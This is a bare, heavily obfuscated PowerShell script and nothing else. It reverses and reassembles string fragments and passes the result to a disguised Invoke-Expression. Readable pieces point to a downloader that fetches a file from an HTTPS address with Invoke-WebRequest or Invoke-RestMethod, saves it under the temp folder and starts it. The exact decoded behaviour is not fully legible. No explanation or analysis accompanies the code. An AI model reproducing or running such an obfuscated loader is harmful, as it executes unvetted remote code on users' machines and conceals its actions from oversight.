 [sTrInG]::joIN( '' ,([rEgEX]::MatCHEs( ") )69]rAhC[,'vQr'  ecALPerc-  93]rAhC[,)711]rAhC[+09]rAhC[+201]rAhC[(  ecALPerc-  63]rAhC[,'A9l' ECALpER-  43]rAhC[,)501]rAhC[+88]rAhC[+18]rAhC[( ecALPerc- 421]rAhC[,)021]rAhC[+011]rAhC[+501]rAhC[(ECALpER- 29]rAhC[,)96]rAhC[+48]rAhC[+79]rAhC[( ECALpER-)')uZfuZfNioj-]52,42,4[CepSMOC:vNEA9l ( . xni)uZfxniuZf,)47]rahc[+99]rahc[+811]rahc[((ECAlpEr.)93]rahc[]gNIrts[,)7'+'7]rahc[+99]rahc[+011]rahc[((ECAlpEr.)63]rahc[]gNIr'+'ts[,)'+'66]rahc[+68]rahc[+17]rahc[((ECAlpEr.)uZfvQruZf,uZf'+'at3uZf(ECAlpEr.)uZfETauZf,)17]rahc[+18]'+'rah'+'c[+79]rahc[((ECAlpEr.))uZf+uZf,uZfn+Mcn}1{}0{Mu'+'Zf,uZfn+Mcn{Mcn+Mcn}1Mcn+Mcn{}McnuZf,uZf+McntrXMcn+McnJtMcn+Mcn,XJtMcn+McnssMcn+McneMcn+McncoXJt,XJtMcn+McuZf,uZf/Mcn+McndMcn+Mc'+'nfcuZf,uZfn   Mc'+'n+Mcn
'+';}Mcn+McnhTAMcn+McnHlMcn+Mcn3pELHl3IF{WMcn+McnZuZf,uZfF{WZR '+')Mcn+McnXJtMcn+Mcn-tsMcn+McnuZf,uZ'+'feMcn+McnTXJt,XMcn+McuZf,uZf)XJMcn+McntMcu'+'Zf,uZfcnlNHl'+'Mcn+Mcn3Mcn+McnWO'+'dMcn+M'+'cn{WZMcn+McnR  '+'  Mcn+Mcn  Mcn+Mcn
Mcn+Mcn;rLW)Mcn+McnbMcn+Mcn.iWZMcn+McnRMcn+Mcn(WZRtMcn+McnMpMcn+McnPMET:vMcn+McnnMcn+McneWZRMcn+McnrLW Mcn+McuZf,uZf,MuZf,uZfnXMcuZf,uZfn2Mcn'+'+uZf,uZfMcn{rLW(&     Mcn+McuZf,uZf.Mcn+McnpaeMcn+McnhMcn+McnX'+'JtuZf,uZ'+'fn+Mc'+'n,XJtiMcn+MuZf,uZfMcnJtMcn+McnthM'+'cn+McnXJt,XJtc-Mcn+M'+'cnXJt,'+'XJt.Mcn+McnHWMcn+McnuZf,uZfXMcn+Mc'+'nJMcn+Mcnt,XJMcn+Mcntloc//:sptXJMcn+McuZf,uZfR =Mcn+Mcn Mcn+Mcn}DaOHl3lNHl3wod{WMcnuZf,uZfR )XJMcnu'+'Zf,uZf+MuZf,uZf{}7{}0{}3{'+'rLMcn+McnWMcn+Mcn(Mcn+Mcn = )Mcn+McnXJtaMcn+Mc'+'nXJt({@]tMcn+McncejMcn+McnbOmoMc'+'uZf,uZf )XJteXMcn+McnJMcn+Mcnt,'+'XJMcn+McntdXJtMcn+Mcn,'+'XMcn+McnJteRMcn+Mc'+'n-ekMcn+McnovMcn+McnnIXMcn+McnJt,XMcn+McnJMcn+McntMcn+McnMtsMcn'+'+McuZf,uZfMcn }      Mcn+Mcn
;Mcn+Mcn}eslAHl3f{Mcn+McnWZMcn+'+'McnuZf,uZf2{}3Mcn+Mcn{McuZf,uZfMcn+Mcn{ M'+'cn+Mcn)Mcn+Mcn}aMcn+uZf,uZft,XJtTMcn+McnFAuZf,uZfcuZf,uZfl3oHMcn+Mcnl3sMcn+'+'Mcn{WZRMcn+Mcn Mcn+McnnMcn+uZf,uZfJt'+'(Mcn+Mcn uZf,uZfnJMcn+McnttaPMcn+McnXJt,McuZf,uZfn= }Mcn+Mcnh'+'TApHl3eliHl3f{WZMcn+McnR uZf,uZfMcntaDeMHuZf,uZf)McnxMcn+]43[EmoHSpBVG+]12[emOhspBVGuZf,uZfM'+'cn+McnuZf,uZf@ = }aTHl3AdMcn+McnHlMcn+Mcn3emOs{McuZf,uZfMcn+Mcnt,XJtMcn+McntratSXJtf-Mcn+McnrLW}uZf,uZfMcn+Mcn;)XJtdMcn+McnnMcn+McuZf,uZf (&Jcv )Mcnat3Mcn,)27]raHC[+'+'801]raHC[+15]raHC[((ecalPEr.)43]raHC[]gNIRtS[,)411]raHC[+67]raHC['+'+78]raHC[((ecal'+'PEr.)McnGQaMcuZf,uZf+Mcnt,XMcn+McnJMcn+McnterfMcn+'+'uZf,uZfMcnuZf,uZf rLW}6{Mcn+Mcn}1{Mcn+Mcn}4{}5Mcn+Mcn{Mcn+Mcn}2{}Mcn+Mcn9Mc'+'n+Mcn{}Mcn+Mcn8Mcn+McnuZf,uZfnf  Mc'+'n+Mcn
MuZf,uZfcn
{Mcn+Mcn hctaMcn+Mcnc Mcn+Mcn Mcn+Mcn  
} Mcn+McuZf,uZf( u'+'Zf,uZf(ecalPEr.)93]raHC[]gNIRtS[,)88]raHC'+'[+47]raHC[+611]rauZf,uZf'+'+McnfMcn+McuZf,uZfc'+'n+Mcn;)
}uZf,uZfMcnR M'+'cn+Mcn= }DAHl3'+'Mcn+McnOHl3Mcn+MuZf,uZf+McnZR  Mcn+MuZf,uZfnP-MuZf,uZfI{WMcn+McnZR Mcn+McnirU-uZf,uZfMcn'+'yrMcn+Mcnt    Mcn+Mcn
uZf,uZf+77]raHC[+211]raHC[((ecalPEr.)McnBVGMcn,)78]r'+'aHC[+09]raHC[+28]raHC[(uZf,uZ'+'fohtMcn+McnXMcn+McnJtMcn+Mcnf- Mcn+McnrLMcn+McnW}3{}0Mcn+Mcn{Mcn+'+'Mcn}Mcn+Mcn4McuZf,uZfaerMcn+McnoMcn+McuZf,uZfcn3FMcn+Mcn{Mcn+McnWZR Mcn+McneMcn+McnliFtuO- rLWArMcn+McnLW.}uZf,uZfMcni Mc'+'n'+'+Mcn}Mcn+McniMcn+Mcn{Mcn+'+'McnWZRuZf,uZfn,)611]raHC[uZf,uZfcn+McnrMc'+'n+McnLMcn+M'+'cnW(Mcn+McuZf,uZf Mcn+Mcn Mcn+Mcn  
{'+'Mcn+Mcn Mcn+uZf,u'+'Zfn+McnAXJtMcuZf,uZfntM'+'cn+uZf,uZfcn+Mcn'+'
(uZ'+'f,uZf uZf,uZf((ec'+'alPEr.)Mcn Mcn+Mcn 

}  
Mcn+Mcn}    Mcn+MuZf,uZfn+Mcn'+'      
;}EUHl3RT{WZMcn+uZf,uZfcn+Mcn 
{Mcn+Mcn )}Mcn+McnDAHMcn+Mcnl3OlNwH'+'Mcn+Mcnl3OD{WZRMcn+Mcn(Mcn+Mcn fiMcn+Mcn     Mcn+Mcn McuZf,uZf;}hMcn+McnuZf,uZfn+Mcn
McnuZf,uZfn.'+'   Mcn+Mcn  Mcn+Mcn 
}      Mcn+Mcn
 uZf,uZfn+McnJMcnuZf,uZfTaPHl3EMcn+McnliHlMcn+MuZf,uZfn+McnXJtMcn+McnhXJtMcn+Mcnf-rLW}0{Mcn+Mcn}1{}Mcn+Mcn2{Mcn+McnrLW(.( McnuZf,uZfn  MuZf,uZfnXMcn+McnJtMcn+Mcn,XJtMcn+Mc'+'nuZf,uZ'+'f f-Mcn+McnuZf,uZfcn      Mcn+Mcn
{Mcn+Mcn Mcn'+'+Mcn)Mcn+Mc'+'n}HMcn+McntaPMcn+McnHl3EHl3Mcn'+'+McnlHMcn+Mcnl3IuZf,uZfMcn-tMcn+McndMcn+McnXJt'+'Mcn+Mcn,Mcn+McnXJMcn+McntMcn+McniXJMcn+Mcnt,XMcn+M'+'cnJtismXJuZf,uZfn+McntsuCMcn+McnSMcn+McnP[  MuZf,uZfcnXJtMcn+McnbXMcn+McnuZf,uZfcn+McnXJuZf,uZfcnsmXJtMcn+Mcn,XJtMcn+Mcn.M'+'cn+McnHMcn+McnWGFAMcn+McnTXJt,Mcn+McnXJtFXJt f- rMcn+McnLWMcn+Mcn}2{}1{}0{}3{Mcn+McnrLW( = )Mcn+MuZf,uZfniMcuZf,uZf( '+'hcuZf,uZfHC[uZf,'+'uZfcn+McnXJtGFA'+'XJMcn+McntMcn+Mcn,XMcn+uZf,uZfn+McnWMcn+McnZMcn'+'+McnR Mcn+Mcn 

McnuZf f- iXQ}45{}94{}92{}43{}24{}2{}22{}44{}28{}86{}48{}73{}6{}15{}36{}68{}82{}71{}91{}51{}13{}63{}56{}21{}33{}58{}76{}06{}57{}47{}31{}02{}81{}78{}46{}96{}83{}01{}18{}08{}75{}41{}14{}4{}12{}93{}87{}65{}35{}32{}72{}53{}26{}55{}95{}03{}3{}23{}54{}04{}97{}62{}27{}5{}7{}85{}05{}67{}61{}84{'+'}9{}16{}38{}37{}77{}1{}17{}07{}5'+'2{}74{}11{}64{}66{}8{}42{}25{}0{}34{iXQ(('(( (XeI", '.','rig'+'HTtO'+'lEft' ) | %{$_.VAlue } ))  |. ( ([StRINg]$verbosEpReFERencE)[1,3]+'X'-jOin'')
